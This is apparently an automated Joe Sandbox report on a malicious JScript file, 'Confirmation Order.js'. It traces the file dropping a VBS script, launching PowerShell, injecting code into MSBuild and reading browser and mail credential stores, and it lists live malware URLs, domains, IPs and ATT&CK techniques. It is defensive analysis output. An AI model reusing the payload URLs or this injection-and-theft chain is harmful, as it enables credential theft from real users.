              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594422Jump to behavior
              Source: wscript.exe, 0000000B.00000003.2536506688.000001A037E53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: MSBuild.exe, 0000000E.00000002.2559774270.0000000000C7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 424000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 907008Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7688" "2844" "2376" "2388" "0" "0" "2436" "0" "0" "0" "0" "0" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2565090170.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2565090170.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7880, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7880, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2565090170.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2565090170.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7880, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information521
              Scripting
              Valid Accounts21
              Windows Management Instrumentation
              521
              Scripting
              211
              Process Injection
              1
              Masquerading
              1
              OS Credential Dumping
              1
              Security Software Discovery
              Remote Services1
              Email Collection
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              LSASS Memory1
              Process Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell
              Logon Script (Windows)Logon Script (Windows)31
              Virtualization/Sandbox Evasion
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares1
              Data from Local System
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook211
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information
              LSA Secrets1
              System Network Configuration Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync14
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481479 Sample: Confirmation Order.js Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 horus-protector.pro 2->32 34 5 other IPs or domains 2->34 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for URL or domain 2->50 54 8 other signatures 2->54 8 wscript.exe 16 15 2->8         started        13 wscript.exe 1 2->13         started        signatures3 52 Tries to detect the country of the analysis system (by using the IP) 30->52 process4 dnsIp5 40 horus-protector.pro 104.21.37.117, 49711, 80 CLOUDFLARENETUS United States 8->40 28 C:\Users\user\YLhjFraZZwiadZg.vbs, ISO-8859 8->28 dropped 60 JScript performs obfuscated calls to suspicious functions 8->60 62 Wscript starts Powershell (via cmd or directly) 8->62 64 Windows Shell Script Host drops VBS files 8->64 68 3 other signatures 8->68 15 WmiPrvSE.exe 6 8->15         started        66 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->66 17 powershell.exe 44 13->17         started        file6 signatures7 process8 signatures9 42 Writes to foreign memory regions 17->42 44 Injects a PE file into a foreign processes 17->44 20 MSBuild.exe 15 2 17->20         started        24 wermgr.exe 19 17->24         started        26 conhost.exe 17->26         started        process10 dnsIp11 36 checkip.dyndns.com 132.226.247.73, 64398, 64402, 64406 UTMEMUS United States 20->36 38 reallyfreegeoip.org 188.114.97.3, 443, 64399, 64401 CLOUDFLARENETUS European Union 20->38 56 Tries to steal Mail credentials (via file / registry access) 20->56 58 Tries to harvest and steal browser information (history, passwords, etc) 20->58 signatures12

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Confirmation Order.js8%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://checkip.dyndns.org/0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              http://reallyfreegeoip.org0%URL Reputationsafe
              https://reallyfreegeoip.org0%URL Reputationsafe
              http://checkip.dyndns.org0%URL Reputationsafe
              http://checkip.dyndns.com0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/0%URL Reputationsafe
              http://horus-protector.pro/c/r4.txt100%Avira URL Cloudmalware
              http://horus-protector.pro/c/s4.txt0%Avira URL Cloudsafe
              http://horus-protector.pro/c/D9B784E30%Avira URL Cloudsafe
              http://horus-protector.pro/c/0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalse
                unknown
                reallyfreegeoip.org
                188.114.97.3
                truetrue
                  unknown
                  fp2e7a.wpc.phicdn.net
                  192.229.221.95
                  truefalse
                    unknown
                    horus-protector.pro
                    104.21.37.117
                    truetrue
                      unknown
                      checkip.dyndns.com
                      132.226.247.73
                      truetrue
                        unknown
                        checkip.dyndns.org
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.org/true
                          • URL Reputation: safe
                          unknown
                          http://horus-protector.pro/c/s4.txttrue
                          • Avira URL Cloud: safe
                          unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • URL Reputation: safe
                          unknown
                          http://horus-protector.pro/c/r4.txttrue
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://horus-protector.pro/c/D9B784E3wscript.exe, 00000000.00000003.1254773282.000001C3FA3E3000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33$MSBuild.exe, 0000000E.00000002.2565090170.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D67000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.org/qMSBuild.exe, 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://reallyfreegeoip.orgMSBuild.exe, 0000000E.00000002.2565090170.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D67000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CCF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.orgMSBuild.exe, 0000000E.00000002.2565090170.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D67000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.orgMSBuild.exe, 0000000E.00000002.2565090170.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D82000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D67000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://horus-protector.pro/c/wscript.exe, 00000000.00000003.1254134560.000001C3FA3ED000.00000004.00000020.00020000.00000000.sdmp, Confirmation Order.jstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.comMSBuild.exe, 0000000E.00000002.2565090170.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D67000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 0000000E.00000002.2565090170.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.org/xml/MSBuild.exe, 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          104.21.37.117
                          horus-protector.proUnited States
                          13335CLOUDFLARENETUStrue
                          188.114.97.3
                          reallyfreegeoip.orgEuropean Union
                          13335CLOUDFLARENETUStrue
                          132.226.247.73
                          checkip.dyndns.comUnited States
                          16989UTMEMUStrue
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1481479
                          Start date and time:2024-07-25 09:53:20 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 47s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • GSI enabled (Javascript)
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Confirmation Order.js
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winJS@10/14@3/3
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 54
                          • Number of non-executed functions: 7
                          Cookbook Comments:
                          • Found application associated with file extension: .js
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 199.232.214.172, 192.229.221.95, 52.165.164.15, 20.242.39.171, 20.166.126.56, 40.126.32.134, 40.126.32.68, 20.190.160.20, 20.190.160.14, 40.126.32.136, 20.190.160.22, 40.126.32.76, 40.126.32.74, 20.42.65.92
                          • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                          • Execution Graph export aborted for target MSBuild.exe, PID 7880 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Confirmation Order.js
                          TimeTypeDescription
                          03:54:35API Interceptor40x Sleep call for process: powershell.exe modified
                          03:54:40API Interceptor1666518x Sleep call for process: MSBuild.exe modified
                          03:54:53API Interceptor1x Sleep call for process: wermgr.exe modified
                          09:54:32Task SchedulerRun new task: YLhjFraZZwiadZg path: C:\Users\user\YLhjFraZZwiadZg.vbs
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          188.114.97.3http://kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerrorGet hashmaliciousHTMLPhisherBrowse
                          • kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror
                          Quotation.xlsGet hashmaliciousRemcosBrowse
                          • tny.wtf/jk8Z5I
                          NUEVO ORDEN01_202407238454854.pdf.exeGet hashmaliciousFormBookBrowse
                          • www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
                          DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                          • tny.wtf/cyd
                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/4jaIXkvS/download
                          QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/PM6yPStj/download
                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/0DmcWsUI/download
                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/4jaIXkvS/download
                          QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/PM6yPStj/download
                          Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • tny.wtf/Dl
                          132.226.247.73Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
